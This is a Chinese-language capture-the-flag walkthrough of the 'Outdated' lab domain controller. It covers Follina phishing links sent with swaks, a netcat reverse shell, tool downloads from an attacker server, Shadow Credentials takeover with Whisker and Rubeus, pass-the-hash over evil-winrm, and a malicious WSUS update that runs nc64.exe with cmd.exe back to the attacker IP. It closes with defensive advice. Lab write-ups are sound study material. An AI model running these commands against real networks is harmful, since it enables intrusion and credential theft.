域渗透实战：Outdated 域渗透教学文档

信息收集阶段

1. 端口扫描与初始发现

使用 nmap 进行端口扫描，发现以下关键服务：

• 25/SMTP
• 53/DNS
• 389/LDAP
• 445/SMB
• 5985/WinRM

这些服务表明目标可能是一个 Active Directory 域控制器。

识别到的主机名：

• mail.outdated.htb (TCP 25)
• dc.outdated.htb (LDAP 端口 636、3268、3269)

2. SMB枚举

使用 crackmapexec 确定操作系统：

crackmapexec smb <target_ip>

结果显示为 Windows 10（可能是伪装）

列出共享文件：

smbclient -L //<target_ip>/

发现可访问的共享 /share

下载并分析共享中的PDF文件，发现包含以下CVE漏洞提示：

• CVE-2022-30190 (MSDT/Folina漏洞)
• CVE-2022-30129 (VSCode漏洞)
• CVE-2022-30138 (Windows Print Spooler漏洞)
• CVE-2022-29130 (LDAP RCE)
• CVE-2022-29110 (Excel RCE)

漏洞利用阶段

1. Follina (MSDT) 命令执行漏洞 (CVE-2022-30190)

利用条件：

1. 目标必须访问我们提供的URL
2. 目标必须未修补CVE-2022-30190

验证可利用性：

1. 设置本地HTTP服务器：

php -S <local_ip>:80

2. 使用swaks发送测试邮件：

for i in {1..3}; do
  swaks --server <target_ip> \
        --to "itsupport@outdated.htb" \
        --from "email@mail.com" \
        --body "http://<local_ip>/"
done

生成并利用Payload：

1. 使用MSDT-Follina工具生成payload：

git clone https://github.com/JohnHammond/msdt-follina

2. 设置HTTP服务器和监听器：

nc -lvnp 443

3. 发送包含恶意链接的邮件触发漏洞

获取初始Shell：
等待约3分钟后获得反弹shell

域内信息收集

1. 基础信息收集

• 获取hostname和IP信息
• 收集域内用户、组、计算机等信息

2. 使用Bloodhound进行域分析

1. 上传SharpHound.exe到目标：

Invoke-WebRequest -Uri <your_server>/SharpHound.exe -OutFile C:\temp\SharpHound.exe

2. 运行SharpHound收集数据：

.\SharpHound.exe -c all

3. 通过SMB导出生成的zip文件

4. 在本地Bloodhound中分析数据，发现：

• 用户"sflowers"具有委派权限
• "Group Delegated Object Control"关系

权限提升与横向移动

1. 使用Whisker进行账户接管

工具准备：

1. 从GitHub获取Whisker：

git clone https://github.com/eladshamir/Whisker

2. 使用Visual Studio编译后上传到目标

执行攻击：

.\Whisker.exe add /target:sflowers

这将为sflowers账户添加"Shadow Credentials"

2. 获取NTLM哈希

1. 上传Rubeus.exe到目标
2. 使用Rubeus获取sflowers的NTLM哈希：

.\Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:<cert-password> /getcredentials /show

3. 通过WinRM访问

由于sflowers是"Remote Management Users"组成员，可以使用获取的凭据通过WinRM连接：

evil-winrm -i <target_ip> -u sflowers -H <ntlm_hash>

域控制器横向移动

1. 发现WSUS漏洞

1. 检查WSUS注册表项：

Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate

2. 确认WSUS服务器与DC是同一主机

2. 使用SharpWSUS进行横向移动

1. 上传SharpWSUS.exe到DC
2. 识别WSUS客户端：

.\SharpWSUS.exe locate

3. 创建恶意更新：

.\SharpWSUS.exe create /payload:"C:\temp\nc64.exe" /args:"<attacker_ip> <port> -e cmd.exe" /title:"Critical Update"

4. 批准更新：

.\SharpWSUS.exe approve /updateid:<update_id> /computername:dc.outdated.htb /groupname:"CriticalPatches"

3. 获取系统权限

1. 通过WSUS更新获得DC的system权限
2. 获取root.txt完成渗透

关键工具总结

1. 信息收集：

   • nmap
   • crackmapexec
   • smbclient

2. 漏洞利用：

   • MSDT-Follina (CVE-2022-30190)
   • swaks (邮件发送工具)

3. 域分析：

   • SharpHound
   • Bloodhound

4. 权限提升：

   • Whisker (Shadow Credentials)
   • Rubeus (Kerberos操作)

5. 横向移动：

   • SharpWSUS (WSUS利用)
   • PsExec (远程执行)

防御建议

1. 及时修补已知漏洞，特别是MSDT/Follina漏洞
2. 限制WSUS服务器的权限和访问
3. 监控对msDS-KeyCredentialLink属性的修改
4. 实施最小权限原则，限制委派权限
5. 监控异常邮件活动，特别是包含URL的邮件